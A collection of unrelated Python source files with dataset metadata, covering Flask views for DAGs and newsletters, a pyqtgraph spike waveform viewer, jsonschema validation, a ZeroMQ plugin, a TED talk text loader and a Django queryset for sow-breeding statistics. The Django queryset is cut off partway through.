from flask import ( Blueprint, render_template, request, current_app, url_for, g, redirect ) from main.web import db from main.web.models import Dags bp = Blueprint('dags', __name__, url_prefix='/dags') @bp.route('/', methods=['GET', 'POST']) def dags(): page = request.args.get('page', 1, type=int) dags = Dags.query.order_by(Dags.pub_date.desc()).paginate( page, current_app.config['POSTS_PER_PAGE'], False) next_url = url_for('dags.dags', page=dags.next_num) \ if dags.has_next else None prev_url = url_for('dags.dags', page=dags.prev_num) \ if dags.has_prev else None return render_template('dags/dags.html', dags=dags.items, next_url=next_url, prev_url=prev_url) @bp.route('/detail/<dag_name>') def detail(dag_name): current_dag = Dags.query.filter_by(dag_name=dag_name).first_or_404() return render_template('dags/detail.html', dag=current_dag)
null
main/web/dags/dags.py
dags.py
py
942
python
en
code
null
code-starcoder2
83
[ { "api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call" }, { "api_name": "flask.request.args.get", "line_number": 13, "usage_type": "call" }, { "api_name": "flask.request.args", "line_number": 13, "usage_type": "attribute" }, { "api_name": "flask.request", "line_number": 13, "usage_type": "name" }, { "api_name": "main.web.models.Dags.query.order_by", "line_number": 14, "usage_type": "call" }, { "api_name": "main.web.models.Dags.query", "line_number": 14, "usage_type": "attribute" }, { "api_name": "main.web.models.Dags", "line_number": 14, "usage_type": "name" }, { "api_name": "main.web.models.Dags.pub_date.desc", "line_number": 14, "usage_type": "call" }, { "api_name": "main.web.models.Dags.pub_date", "line_number": 14, "usage_type": "attribute" }, { "api_name": "flask.current_app.config", "line_number": 15, "usage_type": "attribute" }, { "api_name": "flask.current_app", "line_number": 15, "usage_type": "name" }, { "api_name": "flask.url_for", "line_number": 16, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 18, "usage_type": "call" }, { "api_name": "flask.render_template", "line_number": 21, "usage_type": "call" }, { "api_name": "main.web.models.Dags.query.filter_by", "line_number": 27, "usage_type": "call" }, { "api_name": "main.web.models.Dags.query", "line_number": 27, "usage_type": "attribute" }, { "api_name": "main.web.models.Dags", "line_number": 27, "usage_type": "name" }, { "api_name": "flask.render_template", "line_number": 29, "usage_type": "call" } ]
305767334
# coding: utf-8 import flask import requests import auth import config import forms import model import util from main import app @app.route('/admin/newsletter/') @auth.admin_required def newsletter_list(): newsletter_dbs, cursors = model.NewsLetter.get_dbs( order='-created', prev_cursor=True, ) return flask.render_template( 'newsletter/admin/list.html', html_class='newsletter-list', title=u'Список рассылок', newsletter_dbs=newsletter_dbs, next_url=util.generate_next_url(cursors['next']), prev_url=util.generate_next_url(cursors['prev']), api_url=flask.url_for('api.newsletter.list'), ) @app.route('/admin/newsletter/new/') @auth.admin_required def newsletter_new(): newsletter = model.NewsLetter(subject=u'Введите тему') newsletter.put() return flask.redirect( flask.url_for('newsletter_edit', newsletter_id=newsletter.key.id())) @app.route('/admin/newsletter/clone/<int:newsletter_id>/') @auth.admin_required def newsletter_clone(newsletter_id): origin = model.NewsLetter.get_by_id(newsletter_id) if not origin: return flask.redirect(flask.url_for('newsletter_list')) new_newsletter = model.NewsLetter( subject=origin.subject + u' Копия', raw_recipients=origin.raw_recipients, ) new_newsletter.put() return flask.redirect( flask.url_for('newsletter_edit', newsletter_id=new_newsletter.key.id()) ) @app.route( '/admin/newsletter/edit/<int:newsletter_id>/', methods=['GET', 'POST']) @auth.admin_required def newsletter_edit(newsletter_id): newsletter_db = model.NewsLetter.get_by_id(newsletter_id) if not newsletter_db: return flask.redirect(flask.url_for('newsletter_list')) form = forms.NewsLetterForm(obj=newsletter_db) if form.validate_on_submit(): form.populate_obj(newsletter_db) newsletter_db.put() if 'save_and_send' in flask.request.form: res, mail_list = newsletter_db.send() if res.ok: return flask.redirect( flask.url_for( 'show_mail_list', mail_list_id=mail_list.key.id())) flask.flash( u'Упс, что-то пошло не так, попробуйте еще раз - %s' % res.text, 'danger' ) if 'save_and_close' in flask.request.form: return flask.redirect(flask.url_for('newsletter_list')) return flask.render_template( 'newsletter/admin/edit.html', html_class='newsletter-edit', title=u'Редактирование рассылки', form=form, newsletter_db=newsletter_db, get_upload_url=flask.url_for( 'api.resource.upload_parent', parent_key=newsletter_db.key.urlsafe() ), back_url_for='newsletter_list' ) @app.route('/admin/newsletter/mail_list/<int:mail_list_id>/') @auth.admin_required def show_mail_list(mail_list_id): mail_list = model.NewsLetterSend.get_by_id(mail_list_id) return flask.render_template( 'newsletter/admin/mail_list.html', html_class='mail_list', title=u'Рассылка готова к получению письма', mail_list=mail_list, back_url_for='newsletter_list' ) @app.route('/admin/mail_list/black/', methods=['GET', 'POST']) @auth.admin_required def mail_list_black(): if flask.request.method == 'POST': res = requests.get( "https://api.mailgun.net/v3/mg.5studio.ru/bounces", auth=('api', config.CONFIG_DB.mailgun_api_key), params={'limit': 1000} ) if not res.ok: flask.flash( u'Упс, что-то пошло не так, попробуйте еще раз - %s' % res.text, 'danger' ) else: res = [item.get('address', '') for item in res.json().get('items', [])] model.BlackMailList.update(res) return flask.render_template( 'newsletter/admin/black_list.html', html_class='mail-list-black', title=u'Черный список рассылки', black_list=model.BlackMailList.get_black_list(), )
null
main/control/newsletter.py
newsletter.py
py
4,081
python
en
code
null
code-starcoder2
83
[ { "api_name": "model.NewsLetter.get_dbs", "line_number": 18, "usage_type": "call" }, { "api_name": "model.NewsLetter", "line_number": 18, "usage_type": "attribute" }, { "api_name": "flask.render_template", "line_number": 22, "usage_type": "call" }, { "api_name": "util.generate_next_url", "line_number": 27, "usage_type": "call" }, { "api_name": "util.generate_next_url", "line_number": 28, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 29, "usage_type": "call" }, { "api_name": "main.app.route", "line_number": 15, "usage_type": "call" }, { "api_name": "main.app", "line_number": 15, "usage_type": "name" }, { "api_name": "auth.admin_required", "line_number": 16, "usage_type": "attribute" }, { "api_name": "model.NewsLetter", "line_number": 36, "usage_type": "call" }, { "api_name": "flask.redirect", "line_number": 38, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 39, "usage_type": "call" }, { "api_name": "main.app.route", "line_number": 33, "usage_type": "call" }, { "api_name": "main.app", "line_number": 33, "usage_type": "name" }, { "api_name": "auth.admin_required", "line_number": 34, "usage_type": "attribute" }, { "api_name": "model.NewsLetter.get_by_id", "line_number": 45, "usage_type": "call" }, { "api_name": "model.NewsLetter", "line_number": 45, "usage_type": "attribute" }, { "api_name": "flask.redirect", "line_number": 47, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 47, "usage_type": "call" }, { "api_name": "model.NewsLetter", "line_number": 48, "usage_type": "call" }, { "api_name": "flask.redirect", "line_number": 53, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 54, "usage_type": "call" }, { "api_name": "main.app.route", "line_number": 42, "usage_type": "call" }, { "api_name": "main.app", "line_number": 42, "usage_type": "name" }, { "api_name": "auth.admin_required", "line_number": 43, "usage_type": "attribute" }, { "api_name": "model.NewsLetter.get_by_id", "line_number": 62, "usage_type": "call" }, { "api_name": "model.NewsLetter", "line_number": 62, "usage_type": "attribute" }, { "api_name": "flask.redirect", "line_number": 64, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 64, "usage_type": "call" }, { "api_name": "forms.NewsLetterForm", "line_number": 65, "usage_type": "call" }, { "api_name": "flask.request", "line_number": 69, "usage_type": "attribute" }, { "api_name": "flask.redirect", "line_number": 72, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 73, "usage_type": "call" }, { "api_name": "flask.flash", "line_number": 75, "usage_type": "call" }, { "api_name": "flask.request", "line_number": 80, "usage_type": "attribute" }, { "api_name": "flask.redirect", "line_number": 81, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 81, "usage_type": "call" }, { "api_name": "flask.render_template", "line_number": 82, "usage_type": "call" }, { "api_name": "flask.url_for", "line_number": 88, "usage_type": "call" }, { "api_name": "main.app.route", "line_number": 58, "usage_type": "call" }, { "api_name": "main.app", "line_number": 58, "usage_type": "name" }, { "api_name": "auth.admin_required", "line_number": 60, "usage_type": "attribute" }, { "api_name": "model.NewsLetterSend.get_by_id", "line_number": 99, "usage_type": "call" }, { "api_name": "model.NewsLetterSend", "line_number": 99, "usage_type": "attribute" }, { "api_name": "flask.render_template", "line_number": 100, "usage_type": "call" }, { "api_name": "main.app.route", "line_number": 96, "usage_type": "call" }, { "api_name": "main.app", "line_number": 96, "usage_type": "name" }, { "api_name": "auth.admin_required", "line_number": 97, "usage_type": "attribute" }, { "api_name": "flask.request", "line_number": 112, "usage_type": "attribute" }, { "api_name": "requests.get", "line_number": 113, "usage_type": "call" }, { "api_name": "config.CONFIG_DB", "line_number": 115, "usage_type": "attribute" }, { "api_name": "flask.flash", "line_number": 119, "usage_type": "call" }, { "api_name": "model.BlackMailList.update", "line_number": 125, "usage_type": "call" }, { "api_name": "model.BlackMailList", "line_number": 125, "usage_type": "attribute" }, { "api_name": "flask.render_template", "line_number": 127, "usage_type": "call" }, { "api_name": "model.BlackMailList.get_black_list", "line_number": 131, "usage_type": "call" }, { "api_name": "model.BlackMailList", "line_number": 131, "usage_type": "attribute" }, { "api_name": "main.app.route", "line_number": 109, "usage_type": "call" }, { "api_name": "main.app", "line_number": 109, "usage_type": "name" }, { "api_name": "auth.admin_required", "line_number": 110, "usage_type": "attribute" } ]
214940190
import pyqtgraph as pg from pyqtgraph.Qt import QtCore, QtGui import numpy as np import pandas as pd from .base import WidgetBase class MyViewBox(pg.ViewBox): pass class WaveformViewer(WidgetBase): def __init__(self, spikesorter = None, parent=None): WidgetBase.__init__(self, parent) self.spikesorter = spikesorter self.layout = QtGui.QVBoxLayout() self.setLayout(self.layout) self.graphicsview = pg.GraphicsView() self.layout.addWidget(self.graphicsview) self.initialize_plot() self.alpha = 60 self.refresh() def initialize_plot(self): self.viewBox1 = MyViewBox() #~ self.viewBox.disableAutoRange() grid = pg.GraphicsLayout(border=(100,100,100)) self.graphicsview.setCentralItem(grid) self.plot1 = grid.addPlot(row=0, col=0, rowspan=2, viewBox=self.viewBox1) self.plot1.hideButtons() self.plot1.showAxis('left', True) grid.nextRow() grid.nextRow() self.viewBox2 = MyViewBox() self.plot2 = grid.addPlot(row=2, col=0, rowspan=1, viewBox=self.viewBox2) self.plot2.hideButtons() self.plot2.showAxis('left', True) self.viewBox2.setXLink(self.viewBox1) #~ self.viewBox.gain_zoom.connect(self.gain_zoom) #~ self.viewBox.xsize_zoom.connect(self.xsize_zoom) @property def catalogue(self): return self.spikesorter.clustering.catalogue def refresh(self): self.plot1.clear() self.plot2.clear() #lines def addSpan(plot): nb_channel = self.spikesorter.dataio.nb_channel samples = self.spikesorter.all_waveforms.columns.levels[1] n_left, n_right = min(samples)+2, max(samples)-1 white = pg.mkColor(255, 255, 255, 20) width = n_right - n_left for i in range(nb_channel): if i%2==1: region = pg.LinearRegionItem([width*i, width*(i+1)-1], movable = False, brush = white) plot.addItem(region, ignoreBounds=True) for l in region.lines: l.setPen(white) vline = pg.InfiniteLine(pos = -n_left + width*i, angle=90, movable=False, pen = pg.mkPen('w')) plot.addItem(vline) addSpan(self.plot1) addSpan(self.plot2) #waveforms for i,k in enumerate(self.catalogue): if not self.spikesorter.cluster_visible[k]: continue wf0 = self.catalogue[k]['center'] mad = self.catalogue[k]['mad'] color = self.spikesorter.qcolors.get(k, QtGui.QColor( 'white')) curve = pg.PlotCurveItem(np.arange(wf0.size), wf0, pen=pg.mkPen(color, width=2)) self.plot1.addItem(curve) color2 = QtGui.QColor(color) color2.setAlpha(self.alpha) curve1 = pg.PlotCurveItem(np.arange(wf0.size), wf0+mad, pen=color2) curve2 = pg.PlotCurveItem(np.arange(wf0.size), wf0-mad, pen=color2) self.plot1.addItem(curve1) self.plot1.addItem(curve2) fill = pg.FillBetweenItem(curve1=curve1, curve2=curve2, brush=color2) self.plot1.addItem(fill) curve = pg.PlotCurveItem(np.arange(wf0.size), mad, pen=color) self.plot2.addItem(curve) #~ ax.axvline(-n_left + width*i, alpha = .05, color = 'k') def on_peak_selection_changed(self): pass #TODO peak the selected peak if only one
null
tridesclous/gui/waveformviewer.py
waveformviewer.py
py
3,821
python
en
code
null
code-starcoder2
83
[ { "api_name": "pyqtgraph.ViewBox", "line_number": 10, "usage_type": "attribute" }, { "api_name": "base.WidgetBase", "line_number": 13, "usage_type": "name" }, { "api_name": "base.WidgetBase.__init__", "line_number": 16, "usage_type": "call" }, { "api_name": "base.WidgetBase", "line_number": 16, "usage_type": "name" }, { "api_name": "pyqtgraph.Qt.QtGui.QVBoxLayout", "line_number": 20, "usage_type": "call" }, { "api_name": "pyqtgraph.Qt.QtGui", "line_number": 20, "usage_type": "name" }, { "api_name": "pyqtgraph.GraphicsView", "line_number": 23, "usage_type": "call" }, { "api_name": "pyqtgraph.GraphicsLayout", "line_number": 35, "usage_type": "call" }, { "api_name": "pyqtgraph.mkColor", "line_number": 69, "usage_type": "call" }, { "api_name": "pyqtgraph.LinearRegionItem", "line_number": 73, "usage_type": "call" }, { "api_name": "pyqtgraph.InfiniteLine", "line_number": 78, "usage_type": "call" }, { "api_name": "pyqtgraph.mkPen", "line_number": 78, "usage_type": "call" }, { "api_name": "pyqtgraph.Qt.QtGui.QColor", "line_number": 91, "usage_type": "call" }, { "api_name": "pyqtgraph.Qt.QtGui", "line_number": 91, "usage_type": "name" }, { "api_name": "pyqtgraph.PlotCurveItem", "line_number": 92, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 92, "usage_type": "call" }, { "api_name": "pyqtgraph.mkPen", "line_number": 92, "usage_type": "call" }, { "api_name": "pyqtgraph.Qt.QtGui.QColor", "line_number": 95, "usage_type": "call" }, { "api_name": "pyqtgraph.Qt.QtGui", "line_number": 95, "usage_type": "name" }, { "api_name": "pyqtgraph.PlotCurveItem", "line_number": 97, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 97, "usage_type": "call" }, { "api_name": "pyqtgraph.PlotCurveItem", "line_number": 98, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 98, "usage_type": "call" }, { "api_name": "pyqtgraph.FillBetweenItem", "line_number": 101, "usage_type": "call" }, { "api_name": "pyqtgraph.PlotCurveItem", "line_number": 104, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 104, "usage_type": "call" } ]
408651941
from __future__ import print_function from jsonschema import validate import jsonschema import json import sys ''' https://spacetelescope.github.io/understanding-json-schema/ http://code.activestate.com/recipes/579135-validate-data-easily-with-json-schema/ ''' ''' definitions ''' # schema = { # "$schema": "http://json-schema.org/draft-04/schema#", # # "definitions": { # "address": { # "type": "object", # "properties": { # "street_address": { "type": "string" }, # "city": { "type": "string" }, # "state": { "type": "string" } # }, # "required": ["street_address", "city", "state"] # } # }, # # "type": "object", # "properties": { # "billing_address": { "$ref": "#/definitions/address" }, # "shipping_address": { "$ref": "#/definitions/address" } # } # } # data = { # "shipping_address": { # "street_address": "1600 Pennsylvania Avenue NW", # "city": "Washington", # "state": "DC" # }, # "billing_address": { # "street_address": "1st Street SE", # "city": "Washington", # "state": "DC" # } # } ''' email format ''' # schema = { # "$schema": "http://json-schema.org/draft-04/schema#", # "type": "string", # "format": "email" # } # # data = "[email protected]" ''' list of emails ''' # schema = { # "$schema": "http://json-schema.org/draft-04/schema#", # "type": "array", # "items": { # "type": "string", # "format": "email" # } # } # data = ["[email protected]", "[email protected]"] ''' list property of emails ''' schema = { "$schema": "http://json-schema.org/draft-04/schema#", "type": "object", "properties": { "email_addresses": { "type": "array", "items": { "type": "string", "format": "email" } } } } data = { "email_addresses": ["aidan", "[email protected]"] } try: validate(data, schema, format_checker=jsonschema.FormatChecker()) except jsonschema.exceptions.ValidationError as ve: sys.stderr.write(str(ve) + "\n")
null
json/json_schema_verifier.py
json_schema_verifier.py
py
2,211
python
en
code
null
code-starcoder2
83
[ { "api_name": "jsonschema.validate", "line_number": 102, "usage_type": "call" }, { "api_name": "jsonschema.FormatChecker", "line_number": 102, "usage_type": "call" }, { "api_name": "jsonschema.exceptions", "line_number": 103, "usage_type": "attribute" }, { "api_name": "sys.stderr.write", "line_number": 104, "usage_type": "call" }, { "api_name": "sys.stderr", "line_number": 104, "usage_type": "attribute" } ]
518261651
# -*- coding: utf-8 -*- import json import logging import time import threading import zmq from lucena.io2.networking import create_pipe logger = logging.getLogger(__name__) class Plugin(object): def __init__(self, zmq_context): self.zmq_context = zmq_context self.poller = zmq.Poller() self.socket, self.worker_socket = create_pipe(self.zmq_context) self.signal = threading.Event() self.thread = None def start(self): if self.thread: raise RuntimeError("Worker already started.") self.thread = threading.Thread(target=self._start_thread) self.thread.daemon = False self.thread.start() self.signal.wait() def stop(self): if self.thread is None: logger.warning("Worker already stopped.") return self.socket.set(zmq.SNDTIMEO, 0) self.socket.send_unicode("$TERM") self.signal.wait() def _run(self): raise NotImplementedError("Implement me in a subclass") def _start_thread(self): self.signal.set() self._run() # At this point the worker has finished # and we can clean up everything. self.socket.close() self.worker_socket.close() self.socket = None self.worker_socket = None self.thread = None self.signal.set() def send(self, *args, **kwargs): return self.socket.send(*args, **kwargs) def send_unicode(self, *args, **kwargs): return self.socket.send_unicode(*args, **kwargs) def send_multipart(self, *args, **kwargs): return self.socket.send_multipart(*args, **kwargs) def send_json(self, *args, **kwargs): return self.socket.send_json(*args, **kwargs) def recv(self, *args, **kwargs): return self.socket.recv(*args, **kwargs) def recv_unicode(self, *args, **kwargs): return self.socket.recv_unicode(*args, **kwargs) def recv_multipart(self, *args, **kwargs): return self.socket.recv_multipart(*args, **kwargs) def handle_pipe(self): # Get just the commands off the pipe request = self.pipe.recv_multipart() try: json_request = json.loads(request[0].decode('utf-8')) command = json_request.get('command') except Exception: command = request.pop(0).decode('UTF-8') if not command: return -1 # Interrupted elif command == "CONFIGURE": port = json_request.get('port') self.configure(port) elif command == "PUBLISH": self.transmit = request.pop(0) if self.interval == 0: self.interval = INTERVAL_DFLT # Start broadcasting immediately self.ping_at = time.time() elif command == "SILENCE": self.transmit = None elif command == "SUBSCRIBE": self.filter = json_request.get('filter') elif command == "UNSUBSCRIBE": self.filter = None elif command == "$TERM": self.terminated = True else: logger.error("zbeacon: - invalid command: {0}".format(command)) def run(self): # Signal actor successfully initialized self.pipe.signal() self.poller = zmq.Poller() self.poller.register(self.pipe, zmq.POLLIN) self.poller.register(self.udp_socket, zmq.POLLIN) while not self.terminated: timeout = 1 if self.transmit: timeout = self.ping_at - time.time() if timeout < 0: timeout = 0 # Poll on API pipe and on UDP socket items = dict(self.poller.poll(timeout * 1000)) if self.pipe in items and items[self.pipe] == zmq.POLLIN: self.handle_pipe() if self.udp_socket.fileno() in items \ and items[self.udp_socket.fileno()] == zmq.POLLIN: self.handle_udp() if self.transmit and time.time() >= self.ping_at: self.send_beacon() self.ping_at = time.time() + self.interval
null
lucena/plugins/plugin.py
plugin.py
py
4,173
python
en
code
null
code-starcoder2
83
[ { "api_name": "logging.getLogger", "line_number": 12, "usage_type": "call" }, { "api_name": "zmq.Poller", "line_number": 18, "usage_type": "call" }, { "api_name": "lucena.io2.networking.create_pipe", "line_number": 19, "usage_type": "call" }, { "api_name": "threading.Event", "line_number": 20, "usage_type": "call" }, { "api_name": "threading.Thread", "line_number": 26, "usage_type": "call" }, { "api_name": "zmq.SNDTIMEO", "line_number": 35, "usage_type": "attribute" }, { "api_name": "json.loads", "line_number": 79, "usage_type": "call" }, { "api_name": "time.time", "line_number": 95, "usage_type": "call" }, { "api_name": "zmq.Poller", "line_number": 110, "usage_type": "call" }, { "api_name": "zmq.POLLIN", "line_number": 111, "usage_type": "attribute" }, { "api_name": "zmq.POLLIN", "line_number": 112, "usage_type": "attribute" }, { "api_name": "time.time", "line_number": 117, "usage_type": "call" }, { "api_name": "zmq.POLLIN", "line_number": 122, "usage_type": "attribute" }, { "api_name": "zmq.POLLIN", "line_number": 125, "usage_type": "attribute" }, { "api_name": "time.time", "line_number": 128, "usage_type": "call" }, { "api_name": "time.time", "line_number": 130, "usage_type": "call" } ]
175352133
import os, zipfile, urllib.request import re, lxml.etree import numpy as np from sklearn.utils import shuffle from sklearn.feature_extraction.text import CountVectorizer class TedData(object): def __init__(self, vocab_size): if not os.path.isfile('ted_en-20160408.zip'): urllib.request.urlretrieve("https://wit3.fbk.eu/get.php?path=XML_releases/xml/ted_en-20160408.zip&filename=ted_en-20160408.zip", filename="ted_en-20160408.zip") with zipfile.ZipFile('ted_en-20160408.zip', 'r') as z: self.xml = lxml.etree.parse(z.open('ted_en-20160408.xml', 'r')) string_documents = [] for raw_document in self.xml.xpath('//content/text()'): # Remove everything in parens no_parens = re.sub(r'\([^)]*\)', '', raw_document) # Remove line breaks and "foo: " prefixes merged_lines = re.sub(r'\n([^:]{,20}:)?', ' ', no_parens) # Lowercase, remove special chars ascii_ = re.sub(r'[^a-z0-9\'\s]+', '', merged_lines.lower()) string_documents.append(ascii_) self.permutation = np.random.permutation(len(string_documents)) string_documents = np.asarray(string_documents)[self.permutation] self.representation = CountVectorizer(stop_words='english', max_features=vocab_size-1, token_pattern='(?u)\\b\w+[\w\']*\\b') self.representation.fit(string_documents[:1585]) self.UNKNOWN = 0 docs = [[self.representation.vocabulary_.get(word, self.UNKNOWN - 1) + 1 for word in doc.split()] for doc in string_documents] self._x_train = np.copy(docs[:1585]) self.x_valid, self.x_valid_l = self._toNumpy(docs[1585:1835]) self.x_test, self.x_test_l = self._toNumpy(docs[1835:]) def _toNumpy(self, array): length = np.array([len(a) for a in array]) mask = np.arange(length.max()) < length[:,None] nparray = np.zeros(mask.shape) nparray[mask] = np.concatenate(array) return nparray, length def vocabulary(self): return self.representation.vocabulary_ class TedDataWithLabels(TedData): def __init__(self, vocab_size): TedData.__init__(self, vocab_size) labels = [ (1 if "technology" in raw_category else 0) + (2 if "entertainment" in raw_category else 0) + (4 if "design" in raw_category else 0) for raw_category in self.xml.xpath('//keywords/text()')] del self.xml labels = np.asarray(labels)[self.permutation] self._y_train = np.copy(labels[:1585]) self.y_valid = labels[1585:1835] self.y_test = labels[1835:] def training_batches(self, batch_size): docs, labels = shuffle(self._x_train, self._y_train) for i in range(0, 1585, batch_size): a, l = self._toNumpy(docs[i:i+batch_size]) yield a, l, labels[i:i+batch_size] class TedDataSeq(TedData): def __init__(self, vocab_size): TedData.__init__(self, vocab_size-3) del self.xml self.START = vocab_size - 3 self.END = vocab_size - 2 self.BLANK = vocab_size - 1 self.x_valid, self.y_valid = self._pad(self.x_valid[1585:1835]) self.x_test, self.y_test = self._pad(self.x_test[1835:]) def _pad(self, documents): length = max(map(len, documents)) batch = np.array([[self.START]+document+[self.END] + [self.BLANK]*(length-len(document)) for document in documents]) return batch[:,:-1], batch[:,1:] def training_batches(self, batch_size): docs = shuffle(self._x_train) docs[np.argsort(map(len, docs), kind='mergesort')] # docs are now sorted but random within the same length for i in range(0, 1585, batch_size): batch = docs[i:i+batch_size] yield self._pad(batch, max(map(len, batch))) def Glove(dims): if not os.path.isfile('glove.6B.zip'): urllib.request.urlretrieve("http://nlp.stanford.edu/data/glove.6B.zip", filename="glove.6B.zip") with zipfile.ZipFile('glove.6B.zip', 'r') as z: file = z.open('glove.6B.'+str(dims)+'d.txt', 'r') embedding = {} for line in file: items = line.decode("utf-8").strip().split(' ') assert len(items) == 51 word = items[0] vec = [float(i) for i in items[1:]] embedding[word] = vec return embedding
null
data.py
data.py
py
4,148
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.path.isfile", "line_number": 10, "usage_type": "call" }, { "api_name": "os.path", "line_number": 10, "usage_type": "attribute" }, { "api_name": "urllib.request.request.urlretrieve", "line_number": 11, "usage_type": "call" }, { "api_name": "urllib.request.request", "line_number": 11, "usage_type": "attribute" }, { "api_name": "urllib.request", "line_number": 11, "usage_type": "name" }, { "api_name": "zipfile.ZipFile", "line_number": 12, "usage_type": "call" }, { "api_name": "lxml.etree.etree.parse", "line_number": 13, "usage_type": "call" }, { "api_name": "lxml.etree.etree", "line_number": 13, "usage_type": "attribute" }, { "api_name": "lxml.etree", "line_number": 13, "usage_type": "name" }, { "api_name": "re.sub", "line_number": 18, "usage_type": "call" }, { "api_name": "re.sub", "line_number": 20, "usage_type": "call" }, { "api_name": "re.sub", "line_number": 22, "usage_type": "call" }, { "api_name": "numpy.random.permutation", "line_number": 25, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 25, "usage_type": "attribute" }, { "api_name": "numpy.asarray", "line_number": 26, "usage_type": "call" }, { "api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 28, "usage_type": "call" }, { "api_name": "numpy.copy", "line_number": 35, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 40, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 41, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 42, "usage_type": "call" }, { "api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call" }, { "api_name": "numpy.asarray", "line_number": 58, "usage_type": "call" }, { "api_name": "numpy.copy", "line_number": 59, "usage_type": "call" }, { "api_name": "sklearn.utils.shuffle", "line_number": 64, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 84, "usage_type": "call" }, { "api_name": "sklearn.utils.shuffle", "line_number": 88, "usage_type": "call" }, { "api_name": "numpy.argsort", "line_number": 89, "usage_type": "call" }, { "api_name": "os.path.isfile", "line_number": 96, "usage_type": "call" }, { "api_name": "os.path", "line_number": 96, "usage_type": "attribute" }, { "api_name": "urllib.request.request.urlretrieve", "line_number": 97, "usage_type": "call" }, { "api_name": "urllib.request.request", "line_number": 97, "usage_type": "attribute" }, { "api_name": "urllib.request", "line_number": 97, "usage_type": "name" }, { "api_name": "zipfile.ZipFile", "line_number": 98, "usage_type": "call" } ]
569578285
import datetime from django.db import models from django.db.models import Subquery, OuterRef, F, ExpressionWrapper, Q, Sum, Avg, Count, Value, Func, \ Case, When, Prefetch from django.db.models.functions import Coalesce, Greatest, Round from django.utils import timezone from django.core.exceptions import ValidationError as DjangoValidationError from core.models import CoreModel, CoreModelManager from core.models import Round as CustomRound from sows_events import models as events_models from sows import models as sows_models from piglets import models as piglets_models import piglets_events import transactions class TourQuerySet(models.QuerySet): def add_sow_data(self): subquery_seminated = self.filter(semination__tour__pk=OuterRef('pk')) \ .values('semination__tour') \ .annotate(cnt_seminated=Count('semination__sow', distinct=True)) \ .values('cnt_seminated') subquery_usound28_suporos = self.filter( ultrasound__tour__pk=OuterRef('pk'), ultrasound__u_type__days=30, ultrasound__result=True) \ .values('ultrasound__tour') \ .annotate(cnt_usound28_sup=Count('ultrasound__sow', distinct=True)) \ .values('cnt_usound28_sup') subquery_usound28_proholost = self.filter( ultrasound__tour__pk=OuterRef('pk'), ultrasound__u_type__days=30, ultrasound__result=False) \ .values('ultrasound__tour') \ .annotate(cnt_usound28_proh=Count('ultrasound__sow', distinct=True)) \ .values('cnt_usound28_proh') subquery_usound35_suporos = self.filter( ultrasound__tour__pk=OuterRef('pk'), ultrasound__u_type__days=60, ultrasound__result=True) \ .values('ultrasound__tour') \ .annotate(cnt_usound35_sup=Count('ultrasound__sow', distinct=True)) \ .values('cnt_usound35_sup') subquery_usound35_proholost = self.filter( ultrasound__tour__pk=OuterRef('pk'), ultrasound__u_type__days=60, ultrasound__result=False) \ .values('ultrasound__tour') \ .annotate(cnt_usound35_proh=Count('ultrasound__sow', distinct=True)) \ .values('cnt_usound35_proh') subquery_abort = self.filter(abortionsow__tour__pk=OuterRef('pk')) \ .values('abortionsow__tour') \ .annotate(cnt_abort=Count('abortionsow__sow', distinct=True)) \ .values('cnt_abort') return self.annotate( count_sow=Count('sows'), count_seminated=Subquery(subquery_seminated), count_usound28_suporos=Subquery(subquery_usound28_suporos), count_usound28_proholost=Subquery(subquery_usound28_proholost), count_usound35_suporos=Subquery(subquery_usound35_suporos), count_usound35_proholost=Subquery(subquery_usound35_proholost), count_abort=Subquery(subquery_abort), ) def add_farrow_data(self): data = dict() for born_type in ['alive', 'dead', 'mummy']: data[f'total_born_{born_type}'] = Subquery( self.filter(sowfarrow__tour__pk=OuterRef('pk')) \ .values('sowfarrow__tour') \ .annotate(total_born=Sum(f'sowfarrow__{born_type}_quantity')) \ .values('total_born') ,output_field=models.IntegerField()) data['gilt_count'] = Subquery(self.filter(gilt__tour__pk=OuterRef('pk')) \ .values('gilt__tour') \ .annotate(cnt_gilt=Count('gilt')) \ .values('cnt_gilt'), output_field=models.IntegerField()) data['count_farrows'] = Subquery( self.filter(sowfarrow__tour__pk=OuterRef('pk')) .values('sowfarrow__tour') \ .annotate(farrow_cnt=Count('sowfarrow__sow')) \ .values('farrow_cnt')) return self.annotate(**data) def add_farrow_percentage(self): return self.annotate(farrow_percentage=ExpressionWrapper( (F('count_farrows') * 100 ) / F('count_seminated'), output_field=models.FloatField())) def add_count_tour_sow(self): data = dict() for ws_number in [1, 2, 3]: data[f'ws{ws_number}_count_tour_sow'] = Subquery( sows_models.Sow.objects.filter(tour__pk=OuterRef('pk')).filter( Q( Q(location__workshop__number=ws_number) | Q(location__section__workshop__number=ws_number) | Q(location__sowAndPigletsCell__workshop__number=ws_number) )) \ .values('tour') \ .annotate(cnt_tour_sow=Count('*')) \ .values('cnt_tour_sow'), output_field=models.IntegerField()) return self.annotate(**data) def add_week_weight(self, places=['3/4', '4/8', '8/5', '8/6', '8/7']): data = dict() for place in places: place_formatted = place.replace('/', '_') weights_subquery = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place=place,) \ .values('place') # total weights weights_subquery_total_weight = weights_subquery.annotate(weight=Sum('total_weight')) \ .values('weight') data[f'week_weight_{place_formatted}'] = Coalesce(Subquery(weights_subquery_total_weight, output_field=models.FloatField()), 0.0) # avg weights weights_subquery_avg_weight = weights_subquery.annotate(avg_weight=Avg('average_weight')) \ .values('avg_weight') 